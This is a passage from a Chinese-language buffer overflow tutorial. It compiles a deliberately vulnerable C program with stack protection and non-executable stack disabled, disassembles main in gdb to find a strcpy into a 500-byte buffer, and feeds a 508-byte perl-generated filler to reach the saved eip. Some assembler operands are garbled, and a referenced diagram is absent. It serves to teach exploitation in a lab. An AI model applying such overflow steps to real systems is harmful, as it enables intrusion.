编译源码:
root@linux:~/pentest# gcc -fno-stack-protector -z execstack -g -o vulnerable vulnerable.c
用gdb调试该程序:
root@linux:~/pentest# gdb vulnerable GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2 Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i686-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /root/pentest/vulnerable...done. (gdb) disass main Dump of assembler code for function main: 0x080483c4 <+0>: push %ebp 0x080483c5 <+1>: mov %esp,%ebp 0x080483c7 <+3>: and {1}xfffffff0,%esp 0x080483ca <+6>: sub {1}x210,%esp 0x080483d0 <+12>: mov 0xc(%ebp),%eax 0x080483d3 <+15>: add {1}x4,%eax 0x080483d6 <+18>: mov (%eax),%eax 0x080483d8 <+20>: mov %eax,0x4(%esp) 0x080483dc <+24>: lea 0x1c(%esp),%eax 0x080483e0 <+28>: mov %eax,(%esp) 0x080483e3 <+31>: call 0x80482f4 <strcpy@plt> 0x080483e8 <+36>: mov {1}x0,%eax 0x080483ed <+41>: leave 0x080483ee <+42>: ret End of assembler dump. (gdb) |
此时在调用strcpy之前,main函数栈帧结构分析如下图所示:
根据此时的栈帧分布可知,要想控制eip的值,就必须往buffer[500]中至少填入508B的内容。
接下来我们继续用gdb调试:
(gdb) b *main+41
Breakpoint 1 at 0x80483ed: file vulnerable.c, line 11.
(gdb) r `perl -e 'print "\x41"x508'`
Starting program: /root/pentest/vulnerable `perl -e 'print "\x41"x508'`
Breakpoint 1, main (argc=2, argv=0xbffff264) at vulnerable.c:11
11 }
(gdb) c
Continuing.
Program exited normally.
(gdb)